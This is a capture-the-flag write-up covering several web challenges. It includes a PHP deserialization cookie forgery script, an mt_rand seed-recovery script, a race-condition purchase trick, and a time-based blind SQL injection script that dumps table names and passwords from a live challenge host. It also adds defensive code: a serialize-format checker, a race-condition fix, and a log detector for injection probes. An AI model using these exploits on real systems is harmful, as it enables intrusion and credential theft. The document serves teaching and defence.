Ordinal scale battle sequences
First: source.zip

From the source code: to get the flag, rank has to be 1. Start by looking for a deserialization point; the Monster class constructor calls unserialize. Next, find where rank can be made 1: the Rank class destructor is where $_SESSION['rank'] is set, and if $this->key === $this->serverKey holds, $_SESSION['rank'] gets modified. So the first certainty is that the serialized object has to be a Rank object whose $rank property is 1.

So how do we satisfy $this->key === $this->serverKey? $this->serverKey = $_SERVER['key'], i.e. serverKey is set to a value we do not know, and the key we control must be strictly equal to it. It is not hard to see that key and serverKey can be kept dynamically identical, that is $this->key = &$this->serverKey. Note that key and serverKey are both private properties, which cannot be accessed or modified from outside the class, so all we need is a constructor inside the class:

```php
public function __construct(){
    $this->key = &$this->serverKey;
}
```

Then comes the Monster class constructor. The important point is that the $encryptKey property of the Monster object is unknown to us; if we knew its value we could forge the cookie. What is used here amounts to a logic flaw: inside the loop $this->encryptKey is fed into the loop, and if $playername is set to %s, $this->encryptKey is output directly. With $this->encryptKey in hand the cookie can be constructed in reverse. The script is attached below; note that the registered user name also takes part in the key calculation.
```php
<?php
class Rank
{
    private $rank = 1;
    private $serverKey; // the server's key
    private $key;
    public function __construct(){
        // Make key a reference to serverKey so that key === serverKey always holds,
        // whatever value $_SERVER['key'] is assigned on the server side.
        $this->key = &$this->serverKey;
    }
}
$a = new Rank();
// Leaked encryptKey (obtained with the %s trick described above)
$key = 'gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL';
// The registered user name also takes part in the key calculation
$data = ['gappp', $key];
$encryptkey = '';
foreach($data as $value)
{
    $encryptkey .= md5($encryptkey.$value);
}
// Cookie = base64(serialize($a) . md5(serialize($a) . $encryptkey))
$key = md5(serialize($a).$encryptkey);
$end = base64_encode(serialize($a).$key);
echo $end;
```
Replace the cookie with this output and it is done.
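The forged cookie passes the challenge's MD5 tag check only because the key leaked. As an added, defender-side example (not part of this writeup or the challenge code), the Python below is a small parser for PHP's serialize() format that a server could run on the decoded cookie before ever calling unserialize: it reports any object (O:) or reference (R:/r:) tokens, which a legitimate cookie for this application should never contain, so the payload is rejected even when its tag verifies. The serialized Rank object, the tag scheme and the key value are constructed here to mirror the writeup, not taken from the challenge.

```python
import base64
import hashlib


def parse_php_serialized(data: bytes):
    """Parse PHP serialize() output into (value, classes, references):
    the decoded value, class names seen in O: tokens, and the number of
    R:/r: reference tokens. Private property names keep their "\\0Class\\0name" form."""
    pos = 0
    classes = []
    refs = 0

    def read_until(sep: bytes) -> bytes:
        nonlocal pos
        end = data.index(sep, pos)
        tok = data[pos:end]
        pos = end + len(sep)
        return tok

    def expect(lit: bytes):
        nonlocal pos
        if data[pos:pos + len(lit)] != lit:
            raise ValueError(f"expected {lit!r} at offset {pos}")
        pos += len(lit)

    def read_map(n: int) -> dict:
        expect(b"{")
        out = {}
        for _ in range(n):
            k = parse()
            out[k] = parse()
        expect(b"}")
        return out

    def parse():
        nonlocal pos, refs
        t = data[pos:pos + 1]
        pos += 2                              # skip "N;" or the "x:" type prefix
        if t == b"N":
            return None
        if t in (b"i", b"d", b"b"):           # i:1;  d:1.5;  b:1;
            raw = read_until(b";")
            return int(raw) if t == b"i" else float(raw) if t == b"d" else raw == b"1"
        if t == b"s":                         # s:<len>:"<bytes>";
            n = int(read_until(b":"))
            expect(b'"')
            s, pos = data[pos:pos + n], pos + n
            expect(b'";')
            return s
        if t == b"a":                         # a:<count>:{k;v;...}
            return read_map(int(read_until(b":")))
        if t == b"O":                         # O:<len>:"<class>":<count>:{...}
            n = int(read_until(b":"))
            expect(b'"')
            name, pos = data[pos:pos + n].decode(), pos + n
            expect(b'":')
            classes.append(name)
            return {"__class__": name, "props": read_map(int(read_until(b":")))}
        if t in (b"R", b"r"):                 # R:<slot>; reference to an earlier slot
            refs += 1
            return ("ref", int(read_until(b";")))
        raise ValueError(f"unknown token {t!r} at offset {pos - 2}")

    value = parse()
    if pos != len(data):
        raise ValueError("trailing bytes after serialized value")
    return value, classes, refs


# Constructed stand-in for the leaked encryptKey (the real value is not reproduced here).
CONSTRUCTED_KEY = b"constructed-key"

# Serialized Rank object as the writeup's constructor produces it: serverKey is N;
# and key is R:3;, a reference back to serverKey's slot (constructed sample).
SAMPLE_SERIALIZED = (b'O:4:"Rank":3:{s:10:"\x00Rank\x00rank";i:1;'
                     b's:15:"\x00Rank\x00serverKey";N;s:9:"\x00Rank\x00key";R:3;}')


def build_cookie(serialized: bytes, key: bytes) -> str:
    """Cookie = base64(serialized . md5(serialized . key)), mirroring the writeup's scheme."""
    digest = hashlib.md5(serialized + key).hexdigest().encode()
    return base64.b64encode(serialized + digest).decode()


def inspect_cookie(cookie_b64: str, key: bytes) -> dict:
    """Decode the cookie, verify the MD5 tag, and report object/reference tokens."""
    raw = base64.b64decode(cookie_b64)
    body, digest = raw[:-32], raw[-32:]
    value, classes, refs = parse_php_serialized(body)
    expected = hashlib.md5(body + key).hexdigest().encode()
    return {"value": value, "classes": classes, "references": refs,
            "digest_ok": digest == expected}


def safe_to_unserialize(report: dict) -> bool:
    """Refuse anything carrying objects or references, even when the tag matches."""
    return not report["classes"] and report["references"] == 0


SAMPLE_COOKIE = build_cookie(SAMPLE_SERIALIZED, CONSTRUCTED_KEY)
```

On the forged cookie the tag check passes (the attacker had the key) but the structural check fails because of the Rank object and the R:3; reference; a plain array of scalars passes both. In PHP itself the same effect comes from unserialize($s, ['allowed_classes' => false]), which turns any O: token into __PHP_Incomplete_Class instead of a live object with a destructor.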
Second serve into the soul
I thought of using a seed brute-force script to recover the random number seed, but it did not feel like there would be enough time, so I referred to
https://www.anquanke.com/post/id/196831
In short, the first generated random number (index 0) and the one at index 227 are enough to compute the seed.
The script is attached directly:
```python
import ast
import subprocess

import requests

s = requests.session()
# Ask the challenge for 228 consecutive random numbers
url = "https://twoshot.hgame.n3ko.co/random.php?times=228"
cookie = {'PHPSESSID': '6s7cbsqbpjgn9l4883sgbovfu6'}
c = s.get(url, cookies=cookie)
# The response body is a list literal; literal_eval parses it without executing anything
ans = ast.literal_eval(c.text)
R0 = ans[0]
R227 = ans[227]
# Run the seed-recovery script (same directory) on outputs 0 and 227;
# its output is what gets submitted as the answer
x = subprocess.check_output(['python', 'reverse_mt_rand.py', str(R0), str(R227), '0', '0'], text=True)
x = x.replace('\n', '')
url2 = "https://twoshot.hgame.n3ko.co/verify.php"
data = {"ans": x}
final = s.post(url=url2, cookies=cookie, data=data)
print(final.text)
```
Remember to put the seed-recovery script in the same directory as this script.
Cosmos secondary market
Use Burp threads to buy low and sell high at the same time: buy at 100 while selling at 200. With 50 buy threads and 100 sell threads the item can be sold.
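The reason the threads work is a check-then-act race in the sell handler. As an added illustration (not part of this writeup and not the challenge's code), the Python below models the worst-case schedule deterministically: every concurrent request passes the "do you still own the item?" check before any of them commits. The naive handler over-sells one item twice; the optimistic variant re-checks at commit time, the in-memory equivalent of an UPDATE ... WHERE items >= 1 that refuses the sale when no row was affected. Prices, balances and the Account class are constructed for the example.

```python
from dataclasses import dataclass


@dataclass
class Account:
    balance: int
    items: int


SELL_PRICE = 200   # the writeup sells at 200 after buying at 100


def sell_naive(acct: Account):
    """Racy sell handler: check, then commit. The yield marks the gap in which
    a second request can also pass the check."""
    if acct.items < 1:
        return "rejected"
    yield "checked"
    acct.items -= 1
    acct.balance += SELL_PRICE
    return "sold"


def sell_optimistic(acct: Account):
    """Same handler with an optimistic re-check at commit time; a request that
    lost the race is refused instead of selling an item that is already gone."""
    expected = acct.items
    if expected < 1:
        return "rejected"
    yield "checked"
    if acct.items != expected:      # someone else committed inside the gap
        return "conflict"
    acct.items -= 1
    acct.balance += SELL_PRICE
    return "sold"


def interleave(requests):
    """Drive the request generators round-robin, so every request runs its
    check before any request commits: the schedule parallel threads can hit."""
    results = [None] * len(requests)
    active = list(range(len(requests)))
    while active:
        for i in list(active):
            try:
                next(requests[i])
            except StopIteration as done:
                results[i] = done.value
                active.remove(i)
    return results


def simulate(handler, items: int = 1, concurrent: int = 2):
    """Sell `items` held items through `concurrent` simultaneous requests."""
    acct = Account(balance=0, items=items)
    results = interleave([handler(acct) for _ in range(concurrent)])
    return results, acct


if __name__ == "__main__":
    print("naive:     ", simulate(sell_naive))
    print("optimistic:", simulate(sell_optimistic))
```

With one item and two requests, the naive handler ends at items = -1 and balance = 400; the optimistic one sells once and reports a conflict for the loser. In a real application the re-check has to happen inside the database (a conditional UPDATE or a row lock), since an in-process check does nothing across several PHP workers.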
Cosmos message board -2
After logging in, most characters other than letters and digits are filtered in delete_id, which is where the injection point was found. Because there is no echo, time-based blind injection is used. The script is attached directly; it dumped the user name and password:
```python
import time

import requests

result = ""
cookie = {"PHPSESSID": "ps8l1kh75fac4kft6uumr02kot"}
for i in range(1, 50):
    print("正在测试第", i)
    for j in range(37, 127):
        # Stage 1: table names. If the i-th character equals chr(j) the server sleeps 5 s.
        url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)%3ddatabase()),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
        # Stage 2: columns of the user table
        #url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)%3d'user'),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
        # Stage 3: the password column
        #url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(password))from(user)),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
        one_time = time.time()
        r = requests.get(url, cookies=cookie)
        #print(r.text)
        two_time = time.time()
        if two_time - one_time >= 5:
            result = result + chr(j)
            print('answer:', result)
            break  # character found, move on to the next position
```
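A probe like this leaves a very recognizable trace on the server side: dozens of requests per second from one session, each carrying a sleep() call and information_schema in the query string, with a few of them taking about five seconds. As an added example (not part of this writeup), the Python below runs over constructed nginx-style access log lines, combined format plus request time in milliseconds as a trailing field, URL-decodes the query string, flags time-delay functions, schema enumeration and comment terminators, and counts hits per client. The log lines, addresses and timings are made up to resemble the script's requests.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log: combined format with request time in ms as the last field.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2020:10:00:01 +0800] "GET /index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)%3ddatabase()),1,1))%3d117,sleep(5),1)%23 HTTP/1.1" 200 12 5004
10.0.0.5 - - [18/Feb/2020:10:00:07 +0800] "GET /index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)%3ddatabase()),1,1))%3d118,sleep(5),1)%23 HTTP/1.1" 200 12 3
10.0.0.5 - - [18/Feb/2020:10:00:08 +0800] "GET /index.php?method=delete&delete_id=1%20and%20benchmark(5000000,md5(1)) HTTP/1.1" 200 12 4871
10.0.0.9 - - [18/Feb/2020:10:00:09 +0800] "GET /index.php?method=delete&delete_id=12 HTTP/1.1" 302 0 2
10.0.0.9 - - [18/Feb/2020:10:00:10 +0800] "GET /index.php HTTP/1.1" 200 4210 3
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<ms>\d+)$'
)

# Indicators matched against the URL-decoded query string (insertion order is kept in reports).
INDICATORS = {
    "time_delay": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)"),
}
SLOW_MS = 4000  # a response this slow on a delete endpoint matches an injected sleep(5)


def parse_line(line: str):
    """Split one access log line into fields; returns None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = unquote_plus(urlsplit(rec["target"]).query)
    rec["ms"] = int(rec["ms"])
    return rec


def classify(rec: dict):
    """Return a finding for a suspicious request, or None for a clean one."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(rec["query"])]
    if not hits:
        return None
    return {"ip": rec["ip"], "ts": rec["ts"], "indicators": hits,
            "slow": rec["ms"] >= SLOW_MS, "query": rec["query"]}


def analyze(log_text: str):
    """Scan a whole log; returns (findings, hits per client IP)."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        finding = classify(rec)
        if finding:
            findings.append(finding)
            per_ip[finding["ip"]] += 1
    return findings, per_ip


if __name__ == "__main__":
    found, by_ip = analyze(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["indicators"], "slow" if f["slow"] else "fast")
    print(dict(by_ip))
```

The three requests from 10.0.0.5 are flagged and the two from 10.0.0.9 are not; the slow flag on two of them is the timing side channel itself showing up in the log. Per-client counts are what turn single hits into an alert: one request with sleep() in it may be noise, ninety of them in a minute from one session is a character-by-character dump in progress. The fix on the application side is unchanged by any of this: bind delete_id as a parameter instead of interpolating it.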
Cosmos chat rooms 2.0
I'm too much of a noob: I did not find the CSP bypass point and do not know how the upload was bypassed, so I will obediently reproduce the wp.